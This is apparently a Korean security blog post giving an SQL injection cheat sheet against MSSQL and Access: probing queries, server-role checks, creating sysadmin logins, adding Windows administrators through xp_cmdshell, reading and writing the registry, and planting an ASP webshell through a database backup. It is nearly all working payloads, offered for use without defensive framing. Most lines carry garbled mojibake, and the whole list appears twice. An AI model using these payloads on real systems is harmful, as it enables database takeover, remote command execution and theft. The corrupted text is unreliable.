반응형
1. 다음과 같은 조건식을 삽입한다.?w結镜?
;and 1=1 ?蚍
;and 1=2 s,F>€w?焗
;and user>0鶯RC?lt;
?0R?
2. 기본적으로 제공되는 기본 시스템 오브젝트에 대한 조건식을 검사해 본다.
褦嚬俺?
;and (select count(*) from sysobjects)>0 mssql 鶙€€黺啞?
;and (select count(*) from msysobjects)>0 access 4???踖
礨穫︹?
3. where 조건식을 넣어 본다.
儉辳 ??
'and ''=' ζ??故K 竩褃!>絤
'and '%25'='!M?腄+
r?Z﹍穀?
4. select 구문을 사용한다. @籸壇?6栫
;and (Select Count(*) from [테이블명])>0 -,╉2礲1?浾瞁2v
;and (select top 1 len(열수) from 테이블명)>0?鐠:#?
V嫸皴飾鴰?
5.
(1) Access U?雠檳
;and (select top 1 asc(mid(컬럼명, 1,1)) from 테이블)>0 跖!a蘱?
%饝韨夁c蟐
(2) Mssql 瘐E`宇咒鯄
;and (select top 1 unicode(substring(컬럼명,1,1)) from 테이블명)>0 延罣nT
急?{肩{
6. 媡伓'鴜嘼?
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- ??P?叻
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));-- O&ヒ/?
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));-- 4獣>,)?
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));-- F歮簆*恦?
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));-- u4??B暞
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));-- r熍?[?n
;and 1=(SELECT IS_MEMBER('db_owner'));-- 珥溙烮[#
漥悕?n
7. ⒎??
;exec master.dbo.sp_addlogin username;-- 檡D???
;exec master.dbo.sp_password null,username,password;-- ∵$饘)?
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 5?)拘?8?
c佚?
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ?嶷?&诈?
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- +OX螱鐓h
糂}mΖ?
8. 慧慺釦葏
;create table dirs(paths varchar(100), id int) ?fe??8?
;insert dirs exec master.dbo.xp_dirtree 'c:' J7???*!
;and (select top 1 paths from dirs)>0 喤犨?醑?
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) |瞀謎}遐s
臉}宄癈?
9. 哴?^t焁K
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 硾_?b?
;insert temp exec master.dbo.xp_availablemedia;-- E壟?嬀?
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- PVH^抡
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- v〡煺銯KXL
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- /t=h
C-禷)囤t3
10. e獀痏髒
xp_regenumvalues h6@镥?饘?
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionRun' 鬕=?緡Q
xp_regread M}滊)q?瑬
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','CommonFilesDir' Ut殯湤.
xp_regwrite REG_SZ REG_DWORD I熰Mf胊
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestValueName','reg_sz','hello' 좋아 ?b?lt;輠?
xp_regdeletevalue 刭<vD傿H?
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestValueName' ?昝D??
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionTestkey' g?
蓹色$酺鹓?
10.mssql의 backup용 webshell LV宠Kxv
use model 閨0叛??
create table cmd(str image); [腫A蠷薊压
insert into cmd(str) values ('<% Dim osc-ript %>'); 婳?t%尥?
backup database model to disk='c:l.asp'; J啖谄?=?
^稥B2@靼
11. 礲秔L智?
;and (select @@version)>0 :抧`i
;and user_name()='dbo' sa $覸鹥?龀?
;and (select user_name())>0 P*`頝E岊,
;and (select db_name())>0 獬??lt;9變
k
12.webshell :`駈&碦
use model 3(5x?`x
create table cmd(str image); 櫍Yr蝴?
insert into cmd(str) values ('<%=server.createobject("wsc-ript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>'); ?归v?
backup database model to disk='g:wwwtestl.asp';
;and 1=1 ?蚍
;and 1=2 s,F>€w?焗
;and user>0鶯RC?lt;
?0R?
2. 기본적으로 제공되는 기본 시스템 오브젝트에 대한 조건식을 검사해 본다.
褦嚬俺?
;and (select count(*) from sysobjects)>0 mssql 鶙€€黺啞?
;and (select count(*) from msysobjects)>0 access 4???踖
礨穫︹?
3. where 조건식을 넣어 본다.
儉辳 ??
'and ''=' ζ??故K 竩褃!>絤
'and '%25'='!M?腄+
r?Z﹍穀?
4. select 구문을 사용한다. @籸壇?6栫
;and (Select Count(*) from [테이블명])>0 -,╉2礲1?浾瞁2v
;and (select top 1 len(열수) from 테이블명)>0?鐠:#?
V嫸皴飾鴰?
5.
(1) Access U?雠檳
;and (select top 1 asc(mid(컬럼명, 1,1)) from 테이블)>0 跖!a蘱?
%饝韨夁c蟐
(2) Mssql 瘐E`宇咒鯄
;and (select top 1 unicode(substring(컬럼명,1,1)) from 테이블명)>0 延罣nT
急?{肩{
6. 媡伓'鴜嘼?
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- ??P?叻
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));-- O&ヒ/?
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));-- 4獣>,)?
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));-- F歮簆*恦?
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));-- u4??B暞
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));-- r熍?[?n
;and 1=(SELECT IS_MEMBER('db_owner'));-- 珥溙烮[#
漥悕?n
7. ⒎??
;exec master.dbo.sp_addlogin username;-- 檡D???
;exec master.dbo.sp_password null,username,password;-- ∵$饘)?
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 5?)拘?8?
c佚?
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ?嶷?&诈?
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- +OX螱鐓h
糂}mΖ?
8. 慧慺釦葏
;create table dirs(paths varchar(100), id int) ?fe??8?
;insert dirs exec master.dbo.xp_dirtree 'c:' J7???*!
;and (select top 1 paths from dirs)>0 喤犨?醑?
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) |瞀謎}遐s
臉}宄癈?
9. 哴?^t焁K
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 硾_?b?
;insert temp exec master.dbo.xp_availablemedia;-- E壟?嬀?
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- PVH^抡
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- v〡煺銯KXL
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- /t=h
C-禷)囤t3
10. e獀痏髒
xp_regenumvalues h6@镥?饘?
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionRun' 鬕=?緡Q
xp_regread M}滊)q?瑬
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','CommonFilesDir' Ut殯湤.
xp_regwrite REG_SZ REG_DWORD I熰Mf胊
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestValueName','reg_sz','hello' 좋아 ?b?lt;輠?
xp_regdeletevalue 刭<vD傿H?
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestValueName' ?昝D??
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionTestkey' g?
蓹色$酺鹓?
10.mssql의 backup용 webshell LV宠Kxv
use model 閨0叛??
create table cmd(str image); [腫A蠷薊压
insert into cmd(str) values ('<% Dim osc-ript %>'); 婳?t%尥?
backup database model to disk='c:l.asp'; J啖谄?=?
^稥B2@靼
11. 礲秔L智?
;and (select @@version)>0 :抧`i
;and user_name()='dbo' sa $覸鹥?龀?
;and (select user_name())>0 P*`頝E岊,
;and (select db_name())>0 獬??lt;9變
k
12.webshell :`駈&碦
use model 3(5x?`x
create table cmd(str image); 櫍Yr蝴?
insert into cmd(str) values ('<%=server.createobject("wsc-ript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>'); ?归v?
backup database model to disk='g:wwwtestl.asp';
반응형
'Security > Web' 카테고리의 다른 글
| 제로보드 pl7 (0) | 2007.03.08 |
|---|---|
| 제로보드 pl7 (0) | 2007.03.08 |
| XSS - 메일로 전송하기 (0) | 2007.03.08 |
| DB 에러메시지를 이용하여 데이터추출하기 (0) | 2007.03.08 |
| XSS (0) | 2007.03.08 |
